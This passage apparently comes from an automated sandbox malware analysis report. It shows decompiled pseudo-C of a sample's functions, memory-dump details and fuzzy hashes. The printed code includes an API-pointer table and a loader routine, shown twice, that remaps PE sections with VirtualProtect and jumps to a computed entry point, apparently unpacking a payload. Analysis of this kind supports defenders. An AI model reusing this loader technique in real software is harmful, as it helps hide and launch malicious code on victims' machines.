                                                                                                                                                  							memcpy(_t347, _t341, _t451 << 2);
                                                                                                                                                  							_t535 =  &(_t535[0xc]);
                                                                                                                                                  							_t533 = _t533 + 1;
                                                                                                                                                  							_t382 = _t382 + 0x14;
                                                                                                                                                  							_t535[0x30] = _t535[0x30] + 1;
                                                                                                                                                  						} while (_t533 < _t535[0x44]);
                                                                                                                                                  						goto L24;
                                                                                                                                                  					}
                                                                                                                                                  					_t535[0x4c] = 1;
                                                                                                                                                  					_t534 = 0x14;
                                                                                                                                                  					do {
                                                                                                                                                  						_t62 = _t534 - 0x14; // 0x0
                                                                                                                                                  						_t383 = E6E9AF4BC( &(_t535[0xc]), _t62);
                                                                                                                                                  						_t455 = E6E9AF4BC( &(_t535[0xc]), _t534);
                                                                                                                                                  						_t517 =  *_t383;
                                                                                                                                                  						_t352 =  *_t455;
                                                                                                                                                  						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
                                                                                                                                                  							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
                                                                                                                                                  						}
                                                                                                                                                  						_t534 = _t534 + 0x14;
                                                                                                                                                  						_t354 = _t535[0x4c] + 1;
                                                                                                                                                  						_t535[0x4c] = _t354;
                                                                                                                                                  					} while (_t354 < _t535[0x44]);
                                                                                                                                                  					_t535[0x44] = _t535[4];
                                                                                                                                                  					goto L21;
                                                                                                                                                  				}
                                                                                                                                                  			}








































































                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b158e
                                                                                                                                                  0x6e9b158e
                                                                                                                                                  0x6e9b158e
                                                                                                                                                  0x6e9b158f
                                                                                                                                                  0x6e9b1590
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b158e
                                                                                                                                                  0x6e9b1553
                                                                                                                                                  0x6e9b1557
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b15d8
                                                                                                                                                  0x6e9b15d8
                                                                                                                                                  0x6e9b15d9
                                                                                                                                                  0x6e9b15dc
                                                                                                                                                  0x6e9b15e6
                                                                                                                                                  0x6e9b15e6
                                                                                                                                                  0x6e9b15ea
                                                                                                                                                  0x6e9b15f1
                                                                                                                                                  0x6e9b164c
                                                                                                                                                  0x6e9b1651
                                                                                                                                                  0x6e9b16a4
                                                                                                                                                  0x6e9b16a4
                                                                                                                                                  0x6e9b16a8
                                                                                                                                                  0x6e9b16ac
                                                                                                                                                  0x6e9b14d6
                                                                                                                                                  0x6e9b14d9
                                                                                                                                                  0x6e9b14de
                                                                                                                                                  0x6e9b14e4
                                                                                                                                                  0x6e9b14e7
                                                                                                                                                  0x6e9b14ee
                                                                                                                                                  0x6e9b14f2
                                                                                                                                                  0x6e9b14f9
                                                                                                                                                  0x6e9b1502
                                                                                                                                                  0x6e9b1506
                                                                                                                                                  0x6e9b150a
                                                                                                                                                  0x6e9b1510
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1510
                                                                                                                                                  0x6e9b16b6
                                                                                                                                                  0x6e9b16c2
                                                                                                                                                  0x6e9b16cd
                                                                                                                                                  0x6e9b16d4
                                                                                                                                                  0x6e9b16dd
                                                                                                                                                  0x6e9b16e7
                                                                                                                                                  0x6e9b16e8
                                                                                                                                                  0x6e9b16f6
                                                                                                                                                  0x6e9b16fb
                                                                                                                                                  0x6e9b16fc
                                                                                                                                                  0x6e9b1709
                                                                                                                                                  0x6e9b170e
                                                                                                                                                  0x6e9b1720
                                                                                                                                                  0x6e9b1725
                                                                                                                                                  0x6e9b172a
                                                                                                                                                  0x6e9b173c
                                                                                                                                                  0x6e9b174e
                                                                                                                                                  0x6e9b1753
                                                                                                                                                  0x6e9b175e
                                                                                                                                                  0x6e9b1765
                                                                                                                                                  0x6e9b176a
                                                                                                                                                  0x6e9b1772
                                                                                                                                                  0x6e9b177b
                                                                                                                                                  0x6e9b177b
                                                                                                                                                  0x6e9b1787
                                                                                                                                                  0x6e9b178e
                                                                                                                                                  0x6e9b179a
                                                                                                                                                  0x6e9b17a6
                                                                                                                                                  0x6e9b17b4
                                                                                                                                                  0x6e9b17c5
                                                                                                                                                  0x6e9b17cc
                                                                                                                                                  0x6e9b17d1
                                                                                                                                                  0x6e9b17da
                                                                                                                                                  0x6e9b17df
                                                                                                                                                  0x6e9b17e1
                                                                                                                                                  0x6e9b17e5
                                                                                                                                                  0x6e9b17e9
                                                                                                                                                  0x6e9b17f6
                                                                                                                                                  0x6e9b1803
                                                                                                                                                  0x6e9b1807
                                                                                                                                                  0x6e9b181b
                                                                                                                                                  0x6e9b181f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1834
                                                                                                                                                  0x6e9b1836
                                                                                                                                                  0x6e9b183e
                                                                                                                                                  0x6e9b183b
                                                                                                                                                  0x6e9b183b
                                                                                                                                                  0x6e9b183b
                                                                                                                                                  0x6e9b1842
                                                                                                                                                  0x6e9b1844
                                                                                                                                                  0x6e9b184a
                                                                                                                                                  0x6e9b1850
                                                                                                                                                  0x6e9b18ac
                                                                                                                                                  0x6e9b18b5
                                                                                                                                                  0x6e9b18b9
                                                                                                                                                  0x6e9b18c6
                                                                                                                                                  0x6e9b18cf
                                                                                                                                                  0x6e9b18d4
                                                                                                                                                  0x6e9b18d8
                                                                                                                                                  0x6e9b18db
                                                                                                                                                  0x6e9b193c
                                                                                                                                                  0x6e9b1952
                                                                                                                                                  0x6e9b195d
                                                                                                                                                  0x6e9b195e
                                                                                                                                                  0x6e9b195f
                                                                                                                                                  0x6e9b1963
                                                                                                                                                  0x6e9b1966
                                                                                                                                                  0x6e9b1be6
                                                                                                                                                  0x6e9b1be9
                                                                                                                                                  0x6e9b1be9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1966
                                                                                                                                                  0x6e9b18e5
                                                                                                                                                  0x6e9b18f5
                                                                                                                                                  0x6e9b18fe
                                                                                                                                                  0x6e9b1907
                                                                                                                                                  0x6e9b1910
                                                                                                                                                  0x6e9b1911
                                                                                                                                                  0x6e9b1912
                                                                                                                                                  0x6e9b1917
                                                                                                                                                  0x6e9b191f
                                                                                                                                                  0x6e9b1927
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1929
                                                                                                                                                  0x6e9b1859
                                                                                                                                                  0x6e9b185e
                                                                                                                                                  0x6e9b1862
                                                                                                                                                  0x6e9b1862
                                                                                                                                                  0x6e9b1866
                                                                                                                                                  0x6e9b1869
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b188a
                                                                                                                                                  0x6e9b188c
                                                                                                                                                  0x6e9b1890
                                                                                                                                                  0x6e9b1892
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1894
                                                                                                                                                  0x6e9b189b
                                                                                                                                                  0x6e9b18a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b18a7
                                                                                                                                                  0x6e9b186e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b196c
                                                                                                                                                  0x6e9b196c
                                                                                                                                                  0x6e9b196d
                                                                                                                                                  0x6e9b197d
                                                                                                                                                  0x6e9b1989
                                                                                                                                                  0x6e9b1992
                                                                                                                                                  0x6e9b199b
                                                                                                                                                  0x6e9b19a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b19a4
                                                                                                                                                  0x6e9b1653
                                                                                                                                                  0x6e9b1655
                                                                                                                                                  0x6e9b1657
                                                                                                                                                  0x6e9b165c
                                                                                                                                                  0x6e9b1661
                                                                                                                                                  0x6e9b1674
                                                                                                                                                  0x6e9b168a
                                                                                                                                                  0x6e9b1693
                                                                                                                                                  0x6e9b1694
                                                                                                                                                  0x6e9b1694
                                                                                                                                                  0x6e9b1696
                                                                                                                                                  0x6e9b1697
                                                                                                                                                  0x6e9b169a
                                                                                                                                                  0x6e9b169e

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a5aa6b57b44497375c336734a7832ac7c2af4f2859f458fd2d6cc4add6eacc70
                                                                                                                                                  • Instruction ID: cb631ac18479d1c2f9435e830321b9a8f95445cb60604c3e98de669b85d57984
                                                                                                                                                  • Opcode Fuzzy Hash: a5aa6b57b44497375c336734a7832ac7c2af4f2859f458fd2d6cc4add6eacc70
                                                                                                                                                  • Instruction Fuzzy Hash: 67326B705083458FD714DFA9C890AEBB7E8BFA5308F108D2DE595872A1EB70E949CF52
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E6E9A6D0C() {
                                                                                                                                                  
                                                                                                                                                  				 *0x6e9bd280 = GetUserNameW;
                                                                                                                                                  				 *0x6E9BD284 = MessageBoxW;
                                                                                                                                                  				 *0x6E9BD288 = GetLastError;
                                                                                                                                                  				 *0x6E9BD28C = CreateFileA;
                                                                                                                                                  				 *0x6E9BD290 = DebugBreak;
                                                                                                                                                  				 *0x6E9BD294 = FlushFileBuffers;
                                                                                                                                                  				 *0x6E9BD298 = FreeEnvironmentStringsA;
                                                                                                                                                  				 *0x6E9BD29C = GetConsoleOutputCP;
                                                                                                                                                  				 *0x6E9BD2A0 = GetEnvironmentStrings;
                                                                                                                                                  				 *0x6E9BD2A4 = GetLocaleInfoA;
                                                                                                                                                  				 *0x6E9BD2A8 = GetStartupInfoA;
                                                                                                                                                  				 *0x6E9BD2AC = GetStringTypeA;
                                                                                                                                                  				 *0x6E9BD2B0 = HeapValidate;
                                                                                                                                                  				 *0x6E9BD2B4 = IsBadReadPtr;
                                                                                                                                                  				 *0x6E9BD2B8 = LCMapStringA;
                                                                                                                                                  				 *0x6E9BD2BC = LoadLibraryA;
                                                                                                                                                  				 *0x6E9BD2C0 = OutputDebugStringA;
                                                                                                                                                  				return 0x6e9bd280;
                                                                                                                                                  			}




                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ef0d3dc98510c0cea0d55b26e3e3d4dda8cce934dd42f54471fab28ea0591a8e
                                                                                                                                                  • Instruction ID: 212ad56d33f0ee27b6f1132f1044fdb148d35398b99528e42e23ebad8e6824b3
                                                                                                                                                  • Opcode Fuzzy Hash: ef0d3dc98510c0cea0d55b26e3e3d4dda8cce934dd42f54471fab28ea0591a8e
                                                                                                                                                  • Instruction Fuzzy Hash: 3511DCF8A19A008F8B58CF49D1908527BF1BF8F31071281AAD8098B365D7B49945CF54
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E6E9ABB44(intOrPtr* __ecx) {
                                                                                                                                                  				void* _t1;
                                                                                                                                                  				void* _t2;
                                                                                                                                                  				intOrPtr* _t4;
                                                                                                                                                  
                                                                                                                                                  				_t4 = __ecx;
                                                                                                                                                  				_t1 = E6E9AC280(__ecx);
                                                                                                                                                  				if(_t1 == 0) {
                                                                                                                                                  					_t2 = E6E9B3064(0x60a28c5c, 0xe96b154c);
                                                                                                                                                  					if(_t2 != 0) {
                                                                                                                                                  						_push( *_t4);
                                                                                                                                                  						asm("int3");
                                                                                                                                                  						asm("int3");
                                                                                                                                                  					}
                                                                                                                                                  					 *_t4 = 0;
                                                                                                                                                  					return _t2;
                                                                                                                                                  				}
                                                                                                                                                  				return _t1;
                                                                                                                                                  			}







                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
                                                                                                                                                  • Instruction ID: 2407438edb059da630a42ca8aa22ae63e16b722afffe3022b5e75e437a7b441e
                                                                                                                                                  • Opcode Fuzzy Hash: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
                                                                                                                                                  • Instruction Fuzzy Hash: 9CD0127540020A36EF541EEDB820F55B77D5FD0294F240C26AB006B45DFFB5D4614F24
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Executed Functions

                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                  			E02F411ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                  				char _v40;
                                                                                                                                                  				char _v44;
                                                                                                                                                  				intOrPtr* _v48;
                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                  				intOrPtr _v56;
                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                  				void* _v68;
                                                                                                                                                  				char* _v72;
                                                                                                                                                  				int _v76;
                                                                                                                                                  				long _v80;
                                                                                                                                                  				long _v84;
                                                                                                                                                  				DWORD* _v88;
                                                                                                                                                  				intOrPtr _v92;
                                                                                                                                                  				int _v96;
                                                                                                                                                  				intOrPtr* _v100;
                                                                                                                                                  				intOrPtr _v104;
                                                                                                                                                  				intOrPtr _v108;
                                                                                                                                                  				void* _v112;
                                                                                                                                                  				intOrPtr _v116;
                                                                                                                                                  				char* _v120;
                                                                                                                                                  				intOrPtr _v124;
                                                                                                                                                  				intOrPtr _v128;
                                                                                                                                                  				intOrPtr _v132;
                                                                                                                                                  				intOrPtr _v136;
                                                                                                                                                  				intOrPtr _v140;
                                                                                                                                                  				intOrPtr _v144;
                                                                                                                                                  				intOrPtr _v148;
                                                                                                                                                  				intOrPtr _v152;
                                                                                                                                                  				intOrPtr _v156;
                                                                                                                                                  				signed int _v160;
                                                                                                                                                  				signed int _v164;
                                                                                                                                                  				intOrPtr _v168;
                                                                                                                                                  				int _v172;
                                                                                                                                                  				char* _v176;
                                                                                                                                                  				intOrPtr _v180;
                                                                                                                                                  				intOrPtr _v184;
                                                                                                                                                  				char _v188;
                                                                                                                                                  				intOrPtr* _t137;
                                                                                                                                                  				int _t143;
                                                                                                                                                  				int _t151;
                                                                                                                                                  				int _t155;
                                                                                                                                                  				int _t182;
                                                                                                                                                  				unsigned int _t199;
                                                                                                                                                  				intOrPtr _t221;
                                                                                                                                                  				intOrPtr _t223;
                                                                                                                                                  				void* _t231;
                                                                                                                                                  				intOrPtr _t234;
                                                                                                                                                  				void* _t241;
                                                                                                                                                  				intOrPtr _t245;
                                                                                                                                                  				intOrPtr _t252;
                                                                                                                                                  				DWORD* _t265;
                                                                                                                                                  				void* _t269;
                                                                                                                                                  				intOrPtr* _t272;
                                                                                                                                                  				intOrPtr* _t273;
                                                                                                                                                  
                                                                                                                                                  				_t137 = _a4;
                                                                                                                                                  				_v44 = 0;
                                                                                                                                                  				_t241 =  *((intOrPtr*)(_t137 + 0x38));
                                                                                                                                                  				 *0x2f44418 = 1;
                                                                                                                                                  				asm("movaps xmm0, [0x2f43010]");
                                                                                                                                                  				asm("movups [0x2f44428], xmm0");
                                                                                                                                                  				_v48 = _t137;
                                                                                                                                                  				_v52 =  *((intOrPtr*)(_t137 + 0x20));
                                                                                                                                                  				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
                                                                                                                                                  				_v188 = _t241;
                                                                                                                                                  				_v184 =  *((intOrPtr*)(_t137 + 0x18));
                                                                                                                                                  				_v180 = 4;
                                                                                                                                                  				_v176 =  &_v44;
                                                                                                                                                  				_v60 =  *((intOrPtr*)(_v48 + 0xc));
                                                                                                                                                  				_v64 = 4;
                                                                                                                                                  				_v68 = _t241;
                                                                                                                                                  				_v72 =  &_v44;
                                                                                                                                                  				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
                                                                                                                                                  				_v76 = _t143;
                                                                                                                                                  				_v188 = _v68;
                                                                                                                                                  				_v184 = 0;
                                                                                                                                                  				_v180 =  *((intOrPtr*)(_v48 + 0x18));
                                                                                                                                                  				_v80 = 0x400;
                                                                                                                                                  				_v84 = 2;
                                                                                                                                                  				_v88 =  &_v44;
                                                                                                                                                  				_v92 = 0;
                                                                                                                                                  				E02F42798();
                                                                                                                                                  				E02F417A5(_v68,  *_v48, _v52);
                                                                                                                                                  				E02F42798( *_v48, 0, _v52);
                                                                                                                                                  				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                                                                                  				_t272 = _t269 - 0x8c;
                                                                                                                                                  				_t231 = _v68;
                                                                                                                                                  				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
                                                                                                                                                  				_v96 = _t151;
                                                                                                                                                  				_v100 = _v68 + 0x3c;
                                                                                                                                                  				_v104 = _t231;
                                                                                                                                                  				_v108 = _t252;
                                                                                                                                                  				if(_t252 != 0) {
                                                                                                                                                  					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                  				}
                                                                                                                                                  				_v144 = _v104;
                                                                                                                                                  				if(_v60 != 0) {
                                                                                                                                                  					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
                                                                                                                                                  					_v152 = 0;
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t221 = _v148;
                                                                                                                                                  						_t199 =  *(_t221 + 0x24);
                                                                                                                                                  						_v156 = _v152;
                                                                                                                                                  						_v160 = _t199 >> 0x0000001e & 0x00000001;
                                                                                                                                                  						_v164 = _t199 >> 0x1f;
                                                                                                                                                  						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
                                                                                                                                                  						_v184 =  *((intOrPtr*)(_t221 + 8));
                                                                                                                                                  						_v180 =  *((intOrPtr*)(0x2f44418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
                                                                                                                                                  						_v176 =  &_v44;
                                                                                                                                                  						_v168 = _t221;
                                                                                                                                                  						_t182 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                                                                  						_t272 = _t272 - 0x10;
                                                                                                                                                  						_t223 = _v156 + 1;
                                                                                                                                                  						_v172 = _t182;
                                                                                                                                                  						_v148 = _v168 + 0x28;
                                                                                                                                                  						_v152 = _t223;
                                                                                                                                                  						if(_t223 == _v60) {
                                                                                                                                                  							goto L5;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L5:
                                                                                                                                                  				 *_t272 = _v68;
                                                                                                                                                  				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
                                                                                                                                                  				_t155 = DisableThreadLibraryCalls(??);
                                                                                                                                                  				_t273 = _t272 - 4;
                                                                                                                                                  				_t234 =  *_v100;
                                                                                                                                                  				_v140 = _t155;
                                                                                                                                                  				_v136 = _t234;
                                                                                                                                                  				_v112 = _v68;
                                                                                                                                                  				if(_t234 == 0) {
                                                                                                                                                  					L2:
                                                                                                                                                  					_t245 = _v48;
                                                                                                                                                  					_v40 =  *((intOrPtr*)(_t245 + 0x34));
                                                                                                                                                  					_v36 =  *((intOrPtr*)(_t245 + 8));
                                                                                                                                                  					_v32 =  *((intOrPtr*)(_t245 + 0x30));
                                                                                                                                                  					_v28 =  *((intOrPtr*)(_t245 + 0x28));
                                                                                                                                                  					_v24 =  *((intOrPtr*)(_t245 + 0x50));
                                                                                                                                                  					_v20 = _v116;
                                                                                                                                                  					 *_t273 = _t245;
                                                                                                                                                  					_v188 = 0;
                                                                                                                                                  					_v184 = 0x74;
                                                                                                                                                  					_v120 =  &_v40;
                                                                                                                                                  					_v124 = 0;
                                                                                                                                                  					_v128 = 0x74;
                                                                                                                                                  					_v132 =  *((intOrPtr*)(_v112 + 0x28));
                                                                                                                                                  					E02F42798();
                                                                                                                                                  					if(_v132 != 0) {
                                                                                                                                                  						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
                                                                                                                                                  						goto __eax;
                                                                                                                                                  					}
                                                                                                                                                  					return 1;
                                                                                                                                                  				} else {
                                                                                                                                                  					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                  					goto L2;
                                                                                                                                                  				}
                                                                                                                                                  			}

                                                                                                                                                  0x02f4138d
                                                                                                                                                  0x02f41429
                                                                                                                                                  0x02f4142f
                                                                                                                                                  0x02f4142f
                                                                                                                                                  0x02f41466
                                                                                                                                                  0x02f413fa
                                                                                                                                                  0x02f413b0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02f413b0

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.399487073.0000000002F40000.00000040.00000010.sdmp, Offset: 02F40000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID: t
                                                                                                                                                  • API String ID: 544645111-2238339752
                                                                                                                                                  • Opcode ID: 63589ba064243ceebf3006ec539737a3769eb8e193f0da2c01d4f42009e6699b
                                                                                                                                                  • Instruction ID: a2deb494f934eb27b1c0b686c6a98a36806a1da5b771871f83315a3a8181f759
                                                                                                                                                  • Opcode Fuzzy Hash: 63589ba064243ceebf3006ec539737a3769eb8e193f0da2c01d4f42009e6699b
                                                                                                                                                  • Instruction Fuzzy Hash: 10B1BCB5E002188FDB14CF68C980A9DFBF1FF88314F5585AAE948AB351D774A981CF91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.399487073.0000000002F40000.00000040.00000010.sdmp, Offset: 02F40000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                                                                  • Instruction ID: adb4355536d8dc9cdd955f9f040997d479926552d17784665f5f3806391cfc78
                                                                                                                                                  • Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                                                                  • Instruction Fuzzy Hash: 9F41F4B5E0521A9FDB04DF98D890AAEBBF1FF48310F15852DE949AB340D775A844CF84
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Executed Functions

                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                  			E00BF11ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                  				char _v40;
                                                                                                                                                  				char _v44;
                                                                                                                                                  				intOrPtr* _v48;
                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                  				intOrPtr _v56;
                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                  				void* _v68;
                                                                                                                                                  				char* _v72;
                                                                                                                                                  				int _v76;
                                                                                                                                                  				long _v80;
                                                                                                                                                  				long _v84;
                                                                                                                                                  				DWORD* _v88;
                                                                                                                                                  				intOrPtr _v92;
                                                                                                                                                  				int _v96;
                                                                                                                                                  				intOrPtr* _v100;
                                                                                                                                                  				intOrPtr _v104;
                                                                                                                                                  				intOrPtr _v108;
                                                                                                                                                  				void* _v112;
                                                                                                                                                  				intOrPtr _v116;
                                                                                                                                                  				char* _v120;
                                                                                                                                                  				intOrPtr _v124;
                                                                                                                                                  				intOrPtr _v128;
                                                                                                                                                  				intOrPtr _v132;
                                                                                                                                                  				intOrPtr _v136;
                                                                                                                                                  				intOrPtr _v140;
                                                                                                                                                  				intOrPtr _v144;
                                                                                                                                                  				intOrPtr _v148;
                                                                                                                                                  				intOrPtr _v152;
                                                                                                                                                  				intOrPtr _v156;
                                                                                                                                                  				signed int _v160;
                                                                                                                                                  				signed int _v164;
                                                                                                                                                  				intOrPtr _v168;
                                                                                                                                                  				int _v172;
                                                                                                                                                  				char* _v176;
                                                                                                                                                  				intOrPtr _v180;
                                                                                                                                                  				intOrPtr _v184;
                                                                                                                                                  				char _v188;
                                                                                                                                                  				intOrPtr* _t137;
                                                                                                                                                  				int _t143;
                                                                                                                                                  				int _t151;
                                                                                                                                                  				int _t155;
                                                                                                                                                  				int _t182;
                                                                                                                                                  				unsigned int _t199;
                                                                                                                                                  				intOrPtr _t221;
                                                                                                                                                  				intOrPtr _t223;
                                                                                                                                                  				void* _t231;
                                                                                                                                                  				intOrPtr _t234;
                                                                                                                                                  				void* _t241;
                                                                                                                                                  				intOrPtr _t245;
                                                                                                                                                  				intOrPtr _t252;
                                                                                                                                                  				DWORD* _t265;
                                                                                                                                                  				void* _t269;
                                                                                                                                                  				intOrPtr* _t272;
                                                                                                                                                  				intOrPtr* _t273;
                                                                                                                                                  
                                                                                                                                                  				_t137 = _a4;
                                                                                                                                                  				_v44 = 0;
                                                                                                                                                  				_t241 =  *((intOrPtr*)(_t137 + 0x38));
                                                                                                                                                  				 *0xbf4418 = 1;
                                                                                                                                                  				asm("movaps xmm0, [0xbf3010]");
                                                                                                                                                  				asm("movups [0xbf4428], xmm0");
                                                                                                                                                  				_v48 = _t137;
                                                                                                                                                  				_v52 =  *((intOrPtr*)(_t137 + 0x20));
                                                                                                                                                  				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
                                                                                                                                                  				_v188 = _t241;
                                                                                                                                                  				_v184 =  *((intOrPtr*)(_t137 + 0x18));
                                                                                                                                                  				_v180 = 4;
                                                                                                                                                  				_v176 =  &_v44;
                                                                                                                                                  				_v60 =  *((intOrPtr*)(_v48 + 0xc));
                                                                                                                                                  				_v64 = 4;
                                                                                                                                                  				_v68 = _t241;
                                                                                                                                                  				_v72 =  &_v44;
                                                                                                                                                  				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
                                                                                                                                                  				_v76 = _t143;
                                                                                                                                                  				_v188 = _v68;
                                                                                                                                                  				_v184 = 0;
                                                                                                                                                  				_v180 =  *((intOrPtr*)(_v48 + 0x18));
                                                                                                                                                  				_v80 = 0x400;
                                                                                                                                                  				_v84 = 2;
                                                                                                                                                  				_v88 =  &_v44;
                                                                                                                                                  				_v92 = 0;
                                                                                                                                                  				E00BF2798();
                                                                                                                                                  				E00BF17A5(_v68,  *_v48, _v52);
                                                                                                                                                  				E00BF2798( *_v48, 0, _v52);
                                                                                                                                                  				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                                                                                  				_t272 = _t269 - 0x8c;
                                                                                                                                                  				_t231 = _v68;
                                                                                                                                                  				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
                                                                                                                                                  				_v96 = _t151;
                                                                                                                                                  				_v100 = _v68 + 0x3c;
                                                                                                                                                  				_v104 = _t231;
                                                                                                                                                  				_v108 = _t252;
                                                                                                                                                  				if(_t252 != 0) {
                                                                                                                                                  					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                  				}
                                                                                                                                                  				_v144 = _v104;
                                                                                                                                                  				if(_v60 != 0) {
                                                                                                                                                  					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
                                                                                                                                                  					_v152 = 0;
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t221 = _v148;
